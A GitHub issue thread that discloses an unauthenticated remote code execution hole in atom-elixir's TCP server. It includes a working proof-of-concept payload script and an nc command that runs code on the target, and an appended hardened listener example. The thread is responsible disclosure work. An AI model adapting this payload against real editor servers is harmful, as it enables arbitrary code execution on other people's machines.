Unauthenticated remote code execution from any host #67

Open
ivan opened this issue Feb 26, 2017 · 2 comments
ivan commented Feb 26, 2017

atom-elixir@master starts a TCP server that listens on all interfaces and evals code without authenticating the user. Anyone on the network can use this to execute arbitrary code with the privileges of the user running atom-elixir. (Note: I believe the atom-elixir 0.2.2 release version is unaffected; I didn't see a TCP server there.)

make_payload.exs:

```elixir
# This can, of course, be far worse.
exploit = ~s{File.touch!("/tmp/atom-elixir-rce")}

payload = %{"buffer" => "", "module" => exploit, "function" => "", "line" => ""}
data    = %{"request" => "definition", "payload" => payload}
bterm   = :erlang.term_to_binary(data)
length  = bterm |> byte_size
:ok     = IO.write(<<101, length :: size(32), bterm :: bitstring>>)
```

Make sure atom-elixir@master is running in Atom (atom --foreground), take note of the port, and run:

```
elixir make_payload.exs | nc 127.0.0.1 PORT
```

and observe /tmp/atom-elixir-rce get created on the target machine (which, as mentioned, does not need to be localhost).

I filed a similar bug on alchemist-server at tonini/alchemist-server#14 and the comments there apply here too, especially: listening only on 127.0.0.1 does not fully resolve the issue because of potential attacks from other users or through the browser.

Owner

msaraiva commented Mar 3, 2017

@ivan thanks for reporting this issue. I'll take a look at it as soon as I finish the new API.

> Note: I believe the atom-elixir 0.2.2 release version is unaffected; I didn't see a TCP server there.

Yes. TCPServer is still in development and has not been published yet.

@mveytsman

@msaraiva I want to bring this to your attention tonini/alchemist-server#14 (comment)

This issue is exploitable from any website via JavaScript.
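
A hardened counterpart to the listener discussed in this thread, as an added example that is not code from atom-elixir or from any commenter: it binds to loopback, requires a per-session token before decoding anything (which also stops other local users and browser-originated requests that cannot know the token), decodes with `:safe`, and accepts the `module` field only as a plain alias. `HardenedFrame`, the token-prefixed frame layout and the way the token reaches the editor are assumptions made for illustration.

```elixir
# Added example: HardenedFrame and its functions are hypothetical names.
defmodule HardenedFrame do
  import Bitwise

  @max_body 1_000_000

  # Bind to loopback on an OS-chosen port and mint a per-session secret.
  # Assumption: the editor process that spawns the server receives the
  # token out of band (for example over the child's stdout).
  def listen do
    token = :crypto.strong_rand_bytes(32)
    {:ok, socket} = :gen_tcp.listen(0, [:binary, active: false, ip: {127, 0, 0, 1}])
    {:ok, port} = :inet.port(socket)
    {socket, port, token}
  end

  # Assumed frame: 32-byte token, then the issue's <<tag, length::32, term>>.
  def parse(<<given::binary-size(32), _tag, len::size(32), body::binary>>, token)
      when len <= @max_body and byte_size(body) == len do
    with true <- secure_equal?(given, token),
         {:ok, term} <- safe_decode(body),
         %{"request" => req, "payload" => %{"module" => mod}}
         when is_binary(req) and is_binary(mod) <- term,
         true <- module_name?(mod) do
      {:ok, req, mod}
    else
      _ -> {:error, :rejected}
    end
  end

  def parse(_frame, _token), do: {:error, :rejected}

  # :safe refuses terms that would create new atoms or external funs.
  defp safe_decode(bin) do
    {:ok, :erlang.binary_to_term(bin, [:safe])}
  rescue
    ArgumentError -> {:error, :bad_term}
  end

  # Accept only a plain alias such as "Enum" or "Foo.Bar", never an expression.
  defp module_name?(mod),
    do: Regex.match?(~r/\A[A-Z][A-Za-z0-9_]*(\.[A-Z][A-Za-z0-9_]*)*\z/, mod)

  # Compare without returning early on the first differing byte.
  defp secure_equal?(a, b) when byte_size(a) == byte_size(b) do
    pairs = Enum.zip(:binary.bin_to_list(a), :binary.bin_to_list(b))
    Enum.reduce(pairs, 0, fn {x, y}, acc -> bor(acc, bxor(x, y)) end) == 0
  end

  defp secure_equal?(_a, _b), do: false
end
```

With this parser, the `module` string from `make_payload.exs` above is rejected twice over: the frame carries no valid token, and the value is not a plain module alias.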
